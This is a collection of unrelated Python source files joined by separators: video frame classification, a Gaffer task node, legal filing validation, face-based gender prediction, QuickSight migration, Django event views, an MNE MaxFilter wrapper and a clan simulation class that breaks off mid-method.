`eta.core.learning.VideoFramesClassifier` to use
window_size (eta.core.types.Number): the size of the sliding window in
which to perform classification
stride (eta.core.types.Number): the stride of the sliding window
confidence_threshold (eta.core.types.Number): [None] a confidence
threshold to use when assigning labels
confidence_weighted_vote (eta.core.types.Boolean): [False] whether to
weight any per-frame-attribute votes by confidence
"""
def __init__(self, d):
self.classifier = self.parse_object(
d, "classifier", etal.VideoFramesClassifierConfig
)
self.window_size = self.parse_number(d, "window_size")
self.stride = self.parse_number(d, "stride")
self.confidence_threshold = self.parse_number(
d, "confidence_threshold", default=None
)
self.confidence_weighted_vote = self.parse_bool(
d, "confidence_weighted_vote", default=False
)
def _build_attribute_filter(threshold):
if threshold is None:
logger.info("Predicting all attributes")
filter_fcn = lambda attrs: attrs
else:
logger.info("Returning predictions with confidence >= %f", threshold)
attr_filters = [
lambda attr: attr.confidence is None
or attr.confidence > float(threshold)
]
filter_fcn = lambda attrs: attrs.get_matches(attr_filters)
return filter_fcn
def _apply_video_frames_classifier(config):
# Build classifier
classifier = config.parameters.classifier.build()
logger.info("Loaded classifier %s", type(classifier))
# Process videos
with classifier:
for data in config.data:
_process_video(data, classifier, config.parameters)
def _process_video(data, classifier, parameters):
# Load labels
if data.input_labels_path:
logger.info(
"Reading existing labels from '%s'", data.input_labels_path
)
labels = etav.VideoLabels.from_json(data.input_labels_path)
else:
labels = etav.VideoLabels()
# Process frames directly
logger.info("Processing video '%s'", data.video_path)
with etav.FFmpegVideoReader(data.video_path) as vr:
_classify_windows(classifier, vr, labels, parameters)
logger.info("Writing labels to '%s'", data.output_labels_path)
labels.write_json(data.output_labels_path)
def _classify_windows(classifier, video_reader, labels, parameters):
# Parameters
wsize = parameters.window_size
wstride = parameters.stride
cthresh = parameters.confidence_threshold
cweighted = parameters.confidence_weighted_vote
# Build filter
attr_filter = _build_attribute_filter(cthresh)
#
# Sliding window classification
#
# FIFO queue of length `wsize` to hold the window of images
imgs = deque([], wsize)
# Containers to store all of the attributes that are generated
attrs_map = defaultdict(lambda: etad.AttributeContainer())
# The next frame at which to run the classifier
next_classify_frame = wsize
for frame_number, img in enumerate(video_reader, 1):
# Ingest next frame
imgs.append(img)
if frame_number < next_classify_frame:
# Not time to classify yet
continue
# Set next classification frame
next_classify_frame += wstride
# Classify window
attrs = attr_filter(classifier.predict(imgs))
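        # Record each predicted attribute against every frame covered by the
        # current window; per-frame votes are resolved by majority voting below.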
for attr in attrs:
for idx in range(frame_number - wsize + 1, frame_number + 1):
attrs_map[idx].add(attr)
# Finalize attributes
for frame_number, attrs in iteritems(attrs_map):
# Majority vote over frame
final_attrs = etad.majority_vote_categorical_attrs(
attrs, confidence_weighted=cweighted
)
labels.add_frame_attributes(final_attrs, frame_number)
def run(config_path, pipeline_config_path=None):
"""Run the apply_video_frames_classifier module.
Args:
config_path: path to a ModuleConfig file
pipeline_config_path: optional path to a PipelineConfig file
"""
config = ModuleConfig.from_json(config_path)
etam.setup(config, pipeline_config_path=pipeline_config_path)
_apply_video_frames_classifier(config)
if __name__ == "__main__":
run(*sys.argv[1:]) # pylint: disable=no-value-for-parameter
|
##########################################################################
#
# Copyright (c) 2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import IECore
import Gaffer
import GafferDispatch
class TextWriter( GafferDispatch.TaskNode ) :
def __init__( self, name="TextWriter", requiresSequenceExecution = False ) :
GafferDispatch.TaskNode.__init__( self, name )
self.__requiresSequenceExecution = requiresSequenceExecution
self.addChild( Gaffer.StringPlug( "fileName", Gaffer.Plug.Direction.In ) )
self.addChild( Gaffer.StringPlug( "mode", defaultValue = "w", direction = Gaffer.Plug.Direction.In ) )
self.addChild( Gaffer.StringPlug( "text", Gaffer.Plug.Direction.In ) )
def execute( self ) :
context = Gaffer.Context.current()
fileName = self["fileName"].getValue()
directory = os.path.dirname( fileName )
if directory :
try :
os.makedirs( directory )
except OSError :
# makedirs very unhelpfully raises an exception if
# the directory already exists, but it might also
# raise if it fails. we reraise only in the latter case.
if not os.path.isdir( directory ) :
raise
text = self.__processText( context )
with file( fileName, self["mode"].getValue() ) as f :
f.write( text )
def executeSequence( self, frames ) :
if not self.__requiresSequenceExecution :
GafferDispatch.TaskNode.executeSequence( self, frames )
return
context = Gaffer.Context( Gaffer.Context.current() )
fileName = self["fileName"].getValue()
with file( fileName, self["mode"].getValue() ) as f :
with context :
for frame in frames :
context.setFrame( frame )
text = self.__processText( context )
f.write( text )
def hash( self, context ) :
h = GafferDispatch.TaskNode.hash( self, context )
h.append( context.getFrame() )
h.append( context.get( "textWriter:replace", IECore.StringVectorData() ) )
self["fileName"].hash( h )
self["mode"].hash( h )
self["text"].hash( h )
return h
def requiresSequenceExecution( self ) :
return self.__requiresSequenceExecution
def __processText( self, context ) :
text = self["text"].getValue()
replace = context.get( "textWriter:replace", IECore.StringVectorData() )
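        # The "textWriter:replace" context entry, when present, holds a
        # ( search, replace ) pair that is substituted into the text below.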
if replace and len(replace) == 2 :
text = text.replace( replace[0], replace[1] )
return text
IECore.registerRunTimeTyped( TextWriter, typeName = "GafferDispatchTest::TextWriter" )
|
# Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Change of Registration filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.registration import (
validate_naics,
validate_name_request,
validate_offices,
validate_party,
validate_registration_court_order,
)
from ...utils import get_str
def validate(filing: Dict) -> Optional[Error]:
"""Validate the Change of Registration filing."""
filing_type = 'changeOfRegistration'
if not filing:
return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
legal_type_path = '/filing/business/legalType'
legal_type = get_str(filing, legal_type_path)
if legal_type not in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
return Error(
HTTPStatus.BAD_REQUEST,
[{'error': babel('A valid legalType is required.'), 'path': legal_type_path}]
)
msg = []
if filing.get('filing', {}).get('changeOfRegistration', {}).get('nameRequest', None):
msg.extend(validate_name_request(filing, filing_type))
if filing.get('filing', {}).get('changeOfRegistration', {}).get('parties', None):
msg.extend(validate_party(filing, legal_type, filing_type))
if filing.get('filing', {}).get('changeOfRegistration', {}).get('offices', None):
msg.extend(validate_offices(filing, filing_type))
msg.extend(validate_naics(filing, filing_type))
msg.extend(validate_registration_court_order(filing, filing_type))
if msg:
return Error(HTTPStatus.BAD_REQUEST, msg)
return None
|
import tensorflow as tf
from tensorflow import keras
import face_recognition as fr
from django.contrib.staticfiles import finders
from django.conf import settings
import numpy as np
model_path = finders.find('files/model.h5')
model = tf.keras.models.load_model(model_path)
model.summary()
def predict(image_path):
image = fr.load_image_file(settings.MEDIA_ROOT + '/' + image_path)
face_encoding = fr.face_encodings(image)
if len(face_encoding) <= 0:
return 'None'
predict = model.predict(np.array(face_encoding).reshape(1, 128))
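    # The model maps the 128-d face encoding to a single probability;
    # values above 0.5 are reported as 'Male', otherwise 'Female'.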
if predict[0] > 0.5:
return 'Male'
return 'Female'
|
from vms.models import Image
for img in Image.objects.filter(access=Image.INTERNAL):
img.access = Image.PRIVATE
img.save()
print('Updated image: %s' % img)
|
#!/usr/bin/env python2
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utility to dump codepoints in a font.
Prints codepoints supported by the font, one per line, in hex (0xXXXX).
"""
import os
import sys
import unicodedata
import gflags as flags
from gftools.util import google_fonts as fonts
from google.apputils import app
FLAGS = flags.FLAGS
flags.DEFINE_bool('show_char', False, 'Print the actual character')
flags.DEFINE_bool('show_subsets', False,
'Print what subsets, if any, char is in')
def main(argv):
if len(argv) < 2:
sys.exit('Must specify one or more font files.')
cps = set()
for filename in argv[1:]:
if not os.path.isfile(filename):
sys.exit('%s is not a file' % filename)
cps |= fonts.CodepointsInFont(filename)
for cp in sorted(cps):
show_char = ''
if FLAGS.show_char:
show_char = (' ' + unichr(cp).strip() + ' ' +
unicodedata.name(unichr(cp), ''))
show_subset = ''
if FLAGS.show_subsets:
show_subset = ' subset:%s' % ','.join(fonts.SubsetsForCodepoint(cp))
print (u'0x%04X%s%s' % (cp, show_char, show_subset)).strip().encode('UTF-8')
if __name__ == '__main__':
app.run()
|
import unittest
from remove_duplicates_sorted_array import remove_duplicates
class Test(unittest.TestCase):
nums = [1, 1, 2]
nums_2 = [0,0,1,1,1,2,2,3,3,4]
def test_removes_duplicates_1(self):
actual = remove_duplicates(self.nums)
expected = 2
self.assertEqual(actual, expected)
def test_removes_duplicates_2(self):
actual = remove_duplicates(self.nums_2)
expected = 5
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
"""
This script is for devs/admins to migrate QuickSight assets across accounts or regions
Author: Ying Wang
Email: wangzyn@amazon.com or ywangufl@gmail.com
Version: Nov-20-2021
Note:
    configuration files are in the ./config folder
    library code is in the ./library folder
    imported functions are in the ./src folder
    the migration folder is for migrating existing QS assets across different accounts/regions.
    the exported_results folder stores some sample QS API exported results.
    the log folder stores logs
Thank you and enjoy the open source self-service BI!
"""
"""
Import libraries
"""
import sys
import boto3
import json
import time
from Migration_scripts.Assets_as_Code.src import functions as func
from Migration_scripts.Assets_as_Code.src import supportive_functions as s_func
import logging
from typing import Any, Dict, List, Optional
from datetime import datetime
"""
#load dev account configuration
#load prod account configuration
"""
f = open('config/dev_configuration.json', )
dev_config = json.load(f)
f = open('config/prod_configuration.json', )
prod_config = json.load(f)
"""
Migration List:
* for migrate_p
"all" will migrate data source, dataset, theme, analysis and dashboard;
"source" means data sources only;
"dataset" means datasets only;
"theme" means theme only;
"analysis" means analysis only;
"dashboard" means dashboard only
"""
migrate_p = 'dashboard'
"""
Sample migration list inputs; please pick one of them and comment out the others
"""
data_source_migrate_list = ["redshift-auto", "mssql", "athena_1","redshift_manual"]
data_set_migrate_list = ["patient_info"]
theme_migrate_list= ["orange"]
analysis_migrate_list= ["QuickSight_Access_Last_24_H_Analysis","Marketing Analysis"]
dashboard_migrate_list = ["QuickSight_Access_Last_24_H", "Marketing Dashboard"]
"""
Process the input to get the finalized migration list
"""
m_list = func.process_migration_list(migrate_p, analysis_migrate_list, dev_config)
"""
Run the migration
"""
res = func.incremental_migration(dev_config, prod_config, migrate_p, m_list)
|
import datetime
import grequests
import requests
import json
import logging
from django.core.urlresolvers import reverse
from django.core.exceptions import PermissionDenied
from django.core.exceptions import ValidationError
from django.http import HttpResponseRedirect
from django.http import HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.shortcuts import redirect
from django.views.decorators.cache import cache_control
from django.views.decorators.http import require_http_methods
from django.views.decorators.http import require_safe
from core.views import respond_with_error
from core.views import require_authentication
from core.views import process_attachments
from core.views import build_pagination_links
from core.views import build_newest_comment_link
from core.api.exceptions import APIException
from core.api.resources import build_url
from core.api.resources import Attachment
from core.api.resources import AttendeeList
from core.api.resources import Comment
from core.api.resources import Event
from core.api.resources import GeoCode
from core.api.resources import Profile
from core.api.resources import response_list_to_dict
from core.api.resources import Site
from core.forms.forms import EventCreate
from core.forms.forms import EventEdit
from core.forms.forms import CommentForm
logger = logging.getLogger('events.views')
create_form = EventCreate
edit_form = EventEdit
form_template = 'forms/event.html'
single_template = 'event.html'
comment_form = CommentForm
@require_safe
def single(request, event_id):
"""
Display a single event with comments and attendees.
"""
# Comment offset.
try:
offset = int(request.GET.get('offset', 0))
except ValueError:
offset = 0
# Create request for event resource.
event_url, event_params, event_headers = Event.build_request(request.get_host(), id=event_id,
offset=offset, access_token=request.access_token)
request.view_requests.append(grequests.get(event_url, params=event_params, headers=event_headers))
# Create request for event attendees.
att_url, att_params, att_headers = Event.build_attendees_request(request.get_host(), event_id,
request.access_token)
request.view_requests.append(grequests.get(att_url, params=att_params, headers=att_headers))
# Perform requests and instantiate view objects.
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
event = Event.from_api_response(responses[event_url])
comment_form = CommentForm(initial=dict(itemId=event_id, itemType='event'))
user = Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None
attendees = AttendeeList(responses[att_url])
attendees_yes = []
attendees_invited = []
user_is_attending = False
for attendee in attendees.items.items:
if attendee.rsvp == 'yes':
attendees_yes.append(attendee)
if request.whoami_url:
if attendee.profile.id == user.id:
user_is_attending = True
elif attendee.rsvp == 'maybe':
attendees_invited.append(attendee)
# Determine whether the event spans more than one day and if it has expired.
# TODO: move stuff that is purely rendering to the template.
today = datetime.datetime.now()
if hasattr(event, 'when'):
end_date = event.when + datetime.timedelta(minutes=event.duration)
is_same_day = False
if end_date.strftime('%d%m%y') == event.when.strftime('%d%m%y'):
is_same_day = True
event_dates = {
'type': 'multiple' if not is_same_day else 'single',
'end': end_date
}
is_expired = True if int(end_date.strftime('%s')) < int(today.strftime('%s')) else False
else:
event_dates = {
'type': 'tba'
}
is_expired = False
# Why is this a minimum of 10%?
rsvp_percentage = event.rsvp_percentage
if len(attendees_yes) and event.rsvp_percentage < 10:
rsvp_percentage = 10
# Fetch attachments for all comments on this page.
# TODO: the code that does this should be in one place.
attachments = {}
for comment in event.comments.items:
c = comment.as_dict
if 'attachments' in c:
c_attachments = Attachment.retrieve(request.get_host(), "comments", c['id'],
access_token=request.access_token)
attachments[str(c['id'])] = c_attachments
view_data = {
'user': user,
'site': Site(responses[request.site_url]),
'content': event,
'comment_form': comment_form,
'pagination': build_pagination_links(responses[event_url]['comments']['links'], event.comments),
'item_type': 'event',
'attendees': attendees,
'attendees_yes': attendees_yes,
'attendees_invited': attendees_invited,
'user_is_attending': user_is_attending,
'event_dates': event_dates,
'rsvp_num_attending': len(attendees_yes),
'rsvp_num_invited': len(attendees_invited),
'rsvp_percentage': rsvp_percentage,
'is_expired': is_expired,
'attachments': attachments
}
return render(request, single_template, view_data)
@require_authentication
@require_safe
def csv(request, event_id):
"""
Downloads a CSV file containing event attendees.
"""
return redirect(
build_url(
request.get_host(),
["events", "%s", "attendeescsv"]
) % (
event_id,
) + "?access_token=" + request.access_token,
)
@require_authentication
@require_http_methods(['GET', 'POST',])
@cache_control(must_revalidate=True, max_age=0)
def create(request, microcosm_id):
"""
Create an event within a microcosm.
"""
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
}
user = Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None
if request.method == 'POST':
form = create_form(request.POST)
if form.is_valid():
event_request = Event.from_create_form(form.cleaned_data)
try:
event_response = event_request.create(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
# invite attendees
invites = request.POST.get('invite')
if len(invites.strip()) > 0:
invited_list = invites.split(",")
attendees = []
if len(invited_list) > 0:
for userid in invited_list:
if userid != "":
attendees.append({
'rsvp': 'maybe',
'profileId': int(userid)
})
if len(attendees) > 0:
try:
response = Event.rsvp_api(request.get_host(), event_response.id, user.id, attendees, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
if response.status_code != requests.codes.ok:
return HttpResponseBadRequest()
# create comment
if request.POST.get('firstcomment') and len(request.POST.get('firstcomment')) > 0:
payload = {
'itemType': 'event',
'itemId': event_response.id,
'markdown': request.POST.get('firstcomment'),
'inReplyTo': 0
}
comment_req = Comment.from_create_form(payload)
try:
comment = comment_req.create(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
try:
process_attachments(request, comment)
except ValidationError:
responses = response_list_to_dict(grequests.map(request.view_requests))
comment_form = CommentForm(
initial={
'itemId': comment.item_id,
'itemType': comment.item_type,
'comment_id': comment.id,
'markdown': request.POST['markdown'],
})
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
'content': comment,
'comment_form': comment_form,
'error': 'Sorry, one of your files was over 5MB. Please try again.',
}
return render(request, form_template, view_data)
return HttpResponseRedirect(reverse('single-event', args=(event_response.id,)))
else:
print 'Event form is not valid'
view_data['form'] = form
view_data['microcosm_id'] = microcosm_id
return render(request, form_template, view_data)
if request.method == 'GET':
view_data['form'] = create_form(initial=dict(microcosmId=microcosm_id))
view_data['microcosm_id'] = microcosm_id
return render(request, form_template, view_data)
@require_authentication
@require_http_methods(['GET', 'POST',])
@cache_control(must_revalidate=True, max_age=0)
def edit(request, event_id):
"""
Edit an event.
"""
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
'state_edit': True
}
if request.method == 'POST':
form = edit_form(request.POST)
if form.is_valid():
event_request = Event.from_edit_form(form.cleaned_data)
try:
event_response = event_request.update(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
return HttpResponseRedirect(reverse('single-event', args=(event_response.id,)))
else:
view_data['form'] = form
view_data['microcosm_id'] = form['microcosmId']
return render(request, form_template, view_data)
if request.method == 'GET':
try:
event = Event.retrieve(request.get_host(), id=event_id, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
view_data['form'] = edit_form.from_event_instance(event)
view_data['microcosm_id'] = event.microcosm_id
try:
view_data['attendees'] = Event.get_attendees(host=request.get_host(), id=event_id,
access_token=request.access_token)
attendees_json = []
for attendee in view_data['attendees'].items.items:
attendees_json.append({
'id': attendee.profile.id,
'profileName': attendee.profile.profile_name,
'avatar': attendee.profile.avatar,
'sticky': 'true'
})
if len(attendees_json) > 0:
view_data['attendees_json'] = json.dumps(attendees_json)
        except APIException as exc:
# Missing RSVPs is not critical, but we should know if it doesn't work.
            logger.error(str(exc))
pass
return render(request, form_template, view_data)
@require_authentication
@require_http_methods(['POST',])
def delete(request, event_id):
"""
Delete an event and be redirected to the parent microcosm.
"""
event = Event.retrieve(request.get_host(), event_id, access_token=request.access_token)
try:
event.delete(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
return HttpResponseRedirect(reverse('single-microcosm', args=(event.microcosm_id,)))
@require_authentication
@require_safe
def newest(request, event_id):
"""
Get redirected to the first unread post in an event.
"""
try:
response = Event.newest(request.get_host(), event_id, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
redirect = build_newest_comment_link(response, request)
return HttpResponseRedirect(redirect)
@require_authentication
@require_http_methods(['POST',])
def rsvp(request, event_id):
"""
Create an attendee (RSVP) for an event. An attendee can be in one of four states:
invited, yes, maybe, no.
"""
responses = response_list_to_dict(grequests.map(request.view_requests))
user = Profile(responses[request.whoami_url], summary=False)
attendee = [dict(rsvp=request.POST['rsvp'],profileId=user.id),]
try:
response = Event.rsvp_api(request.get_host(), event_id, user.id, attendee, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
if response.status_code != requests.codes.ok:
return HttpResponseBadRequest()
return HttpResponseRedirect(reverse('single-event', args=(event_id,)))
def geocode(request):
if request.access_token is None:
raise PermissionDenied
if request.GET.has_key('q'):
response = GeoCode.retrieve(request.get_host(), request.GET['q'], request.access_token)
return HttpResponse(response, content_type='application/json')
else:
return HttpResponseBadRequest()
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from ..externals.six import string_types
import os
from ..bem import fit_sphere_to_headshape
from ..io import read_raw_fif
from ..utils import logger, verbose, warn
from ..externals.six.moves import map
def _mxwarn(msg):
warn('Possible MaxFilter bug: %s, more info: '
'http://imaging.mrc-cbu.cam.ac.uk/meg/maxbugs' % msg)
@verbose
def apply_maxfilter(in_fname, out_fname, origin=None, frame='device',
bad=None, autobad='off', skip=None, force=False,
st=False, st_buflen=16.0, st_corr=0.96, mv_trans=None,
mv_comp=False, mv_headpos=False, mv_hp=None,
mv_hpistep=None, mv_hpisubt=None, mv_hpicons=True,
linefreq=None, cal=None, ctc=None, mx_args='',
overwrite=True, verbose=None):
""" Apply NeuroMag MaxFilter to raw data.
Needs Maxfilter license, maxfilter has to be in PATH
Parameters
----------
in_fname : string
Input file name
out_fname : string
Output file name
origin : array-like or string
Head origin in mm. If None it will be estimated from headshape points.
frame : string ('device' or 'head')
Coordinate frame for head center
bad : string, list (or None)
List of static bad channels. Can be a list with channel names, or a
string with channels (names or logical channel numbers)
autobad : string ('on', 'off', 'n')
Sets automated bad channel detection on or off
skip : string or a list of float-tuples (or None)
Skips raw data sequences, time intervals pairs in sec,
e.g.: 0 30 120 150
force : bool
Ignore program warnings
st : bool
Apply the time-domain MaxST extension
st_buflen : float
MaxSt buffer length in sec (disabled if st is False)
st_corr : float
MaxSt subspace correlation limit (disabled if st is False)
mv_trans : string (filename or 'default') (or None)
Transforms the data into the coil definitions of in_fname, or into the
default frame (None: don't use option)
mv_comp : bool (or 'inter')
Estimates and compensates head movements in continuous raw data
mv_headpos : bool
Estimates and stores head position parameters, but does not compensate
movements (disabled if mv_comp is False)
mv_hp : string (or None)
Stores head position data in an ascii file
(disabled if mv_comp is False)
mv_hpistep : float (or None)
Sets head position update interval in ms (disabled if mv_comp is False)
mv_hpisubt : string ('amp', 'base', 'off') (or None)
Subtracts hpi signals: sine amplitudes, amp + baseline, or switch off
(disabled if mv_comp is False)
mv_hpicons : bool
Check initial consistency isotrak vs hpifit
(disabled if mv_comp is False)
linefreq : int (50, 60) (or None)
Sets the basic line interference frequency (50 or 60 Hz)
(None: do not use line filter)
cal : string
Path to calibration file
ctc : string
Path to Cross-talk compensation file
mx_args : string
Additional command line arguments to pass to MaxFilter
overwrite : bool
Overwrite output file if it already exists
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
origin: string
Head origin in selected coordinate frame
"""
# check for possible maxfilter bugs
if mv_trans is not None and mv_comp:
_mxwarn("Don't use '-trans' with head-movement compensation "
"'-movecomp'")
if autobad != 'off' and (mv_headpos or mv_comp):
_mxwarn("Don't use '-autobad' with head-position estimation "
"'-headpos' or movement compensation '-movecomp'")
if st and autobad != 'off':
_mxwarn("Don't use '-autobad' with '-st' option")
# determine the head origin if necessary
if origin is None:
logger.info('Estimating head origin from headshape points..')
raw = read_raw_fif(in_fname, add_eeg_ref=False)
r, o_head, o_dev = fit_sphere_to_headshape(raw.info, units='mm')
raw.close()
logger.info('[done]')
if frame == 'head':
origin = o_head
elif frame == 'device':
origin = o_dev
else:
            raise RuntimeError('invalid frame for origin')
if not isinstance(origin, string_types):
origin = '%0.1f %0.1f %0.1f' % (origin[0], origin[1], origin[2])
# format command
cmd = ('maxfilter -f %s -o %s -frame %s -origin %s '
% (in_fname, out_fname, frame, origin))
if bad is not None:
# format the channels
if not isinstance(bad, list):
bad = bad.split()
bad = map(str, bad)
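        # Strip a leading 'MEG' prefix so only the numeric part of each channel
        # name is passed to the '-bad' argument.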
bad_logic = [ch[3:] if ch.startswith('MEG') else ch for ch in bad]
bad_str = ' '.join(bad_logic)
cmd += '-bad %s ' % bad_str
cmd += '-autobad %s ' % autobad
if skip is not None:
if isinstance(skip, list):
skip = ' '.join(['%0.3f %0.3f' % (s[0], s[1]) for s in skip])
cmd += '-skip %s ' % skip
if force:
cmd += '-force '
if st:
cmd += '-st '
cmd += ' %d ' % st_buflen
cmd += '-corr %0.4f ' % st_corr
if mv_trans is not None:
cmd += '-trans %s ' % mv_trans
if mv_comp:
cmd += '-movecomp '
if mv_comp == 'inter':
cmd += ' inter '
if mv_headpos:
cmd += '-headpos '
if mv_hp is not None:
cmd += '-hp %s ' % mv_hp
if mv_hpisubt is not None:
        cmd += '-hpisubt %s ' % mv_hpisubt
if mv_hpicons:
cmd += '-hpicons '
if linefreq is not None:
cmd += '-linefreq %d ' % linefreq
if cal is not None:
cmd += '-cal %s ' % cal
if ctc is not None:
cmd += '-ctc %s ' % ctc
cmd += mx_args
if overwrite and os.path.exists(out_fname):
os.remove(out_fname)
logger.info('Running MaxFilter: %s ' % cmd)
if os.getenv('_MNE_MAXFILTER_TEST', '') != 'true': # fake maxfilter
st = os.system(cmd)
else:
print(cmd) # we can check the output
st = 0
if st != 0:
raise RuntimeError('MaxFilter returned non-zero exit status %d' % st)
logger.info('[done]')
return origin
|
'''
Created on 25 Dec 2016
@author: dusted-ipro
'''
import numpy as np
import collections
from environment.sensing import closestStar, closestStarSubSet
from environment import world
class baseClan(object):
'''
Base Clan Class
'''
def __init__(self, starIdx, coords, planetIdx, clanId, energyConsumeRate):
'''
Constructor
'''
self.clanId = clanId
self.clanName = 'clan_{}'.format(self.clanId)
#Where's home - these are the planet coords - not star
self.originCoords = coords
self.originName = ''
#Closest Star - index in world.starCoords
self.originStarIdx = starIdx
#Origin Planet
self.originPlanetIdx = planetIdx
#Array of all the clans agents - dict key lookup to world.agents
self.agents = []
#n Agents * n Agents matrix of link strength (2d array)
self.societyNet = np.zeros((len(self.agents), len(self.agents)))
#n Agents * n Agents matrix of demand and supply (3d array)
self.tradeNet = np.zeros((len(self.agents), len(self.agents), 2))
        #Resource Knowledge {starIdx:{planetIdx:{'rawMat':X, 'energy':Y}, planetIdx:{'rawMat':X, 'energy':Y}}}
#Initially populated with all stars - and no knowledge
self.resourceKnowledge = {}
#Agent job queues
#Explorer - (starIdx, starCoords) - unknown places
self.explorerQ = collections.deque()
#Harvestor - this is basically the resource knowledge sorted by distance
self.harvestorQ = collections.deque()
#Clan Global Resource storage
self.demands = {7:{'store':10.0}}
#{tradableId:storeAmount, ...}
self.store = {0:{'store':0.0}, 1:{'store':0.0}, 2:{'store':0.0},
3:{'store':0.0}, 4:{'store':0.0}, 5:{'store':0.0},
6:{'store':0.0}, 7:{'store':0.0}, 8:{'store':0.0},
9:{'store':0.0}, 10:{'store':0.0}}
self.consumes = {7:{'consumeRate':energyConsumeRate, 'store':10.0}}
def popn(self):
'''
Get the clans total population
::return int total number of agents
'''
return len(self.agents)
def agentPositions(self):
'''
Get the locations of all agents in this clan
::return array of agent.positions
'''
return [agent.position for agent in self.agents]
def societyStrength(self):
'''
Get some basic measure of the society network strength
::return float 0 (weak) -> 1(strong)
'''
return np.sum(self.societyNet)/len(self.agents)
def closestUnknownStar(self, coords):
'''
Get the star index of the closest clan unknown (unscanned) system
'''
uk = []
for k in self.resourceKnowledge.keys():
if self.resourceKnowledge[k] == {}:
uk.append(world.starCoords[k])
return closestStarSubSet(coords, uk)
def rxResourceKnowledge(self, inputKnowledge):
'''
Receive resource knowledge from an explorer or other
'''
for inK in inputKnowledge.keys():
#Check if star knowledge exists
if inK not in self.resourceKnowledge.keys():
#New star
self.resourceKnowledge[inK] = inputKnowledge[inK]
#Add all the planets to the harvestorQ - just the star and planet indexes as tuples
for p in inputKnowledge[inK].keys():
self.harvestorQ.append((inK, p, inputKnowledge[inK][p]))
else:
#Star exists - check we have all the planets
for inP in inputKnowledge[inK]:
if inP not in self.resourceKnowledge[inK].keys():
self.resourceKnowledge[inK][inP] = inputKnowledge[inK][inP]
#Add it to the resource Q
self.harvestorQ.append((inK, inP, inputKnowledge[inK][inP]))
#Reorder Harvestor Q - closest first
self.orderHarvestorQ()
def orderHarvestorQ(self):
'''
Take a moment to re-order the harvestorQ by distance from clan origin
So we can just pop the first one off at any stage
'''
dists = []
for i in self.harvestorQ:
dists.append(np.linalg.norm(world.stars[i[0]].planets[i[1]].position-self.originCoords))
chk = sorted(zip(dists, self.harvestorQ))
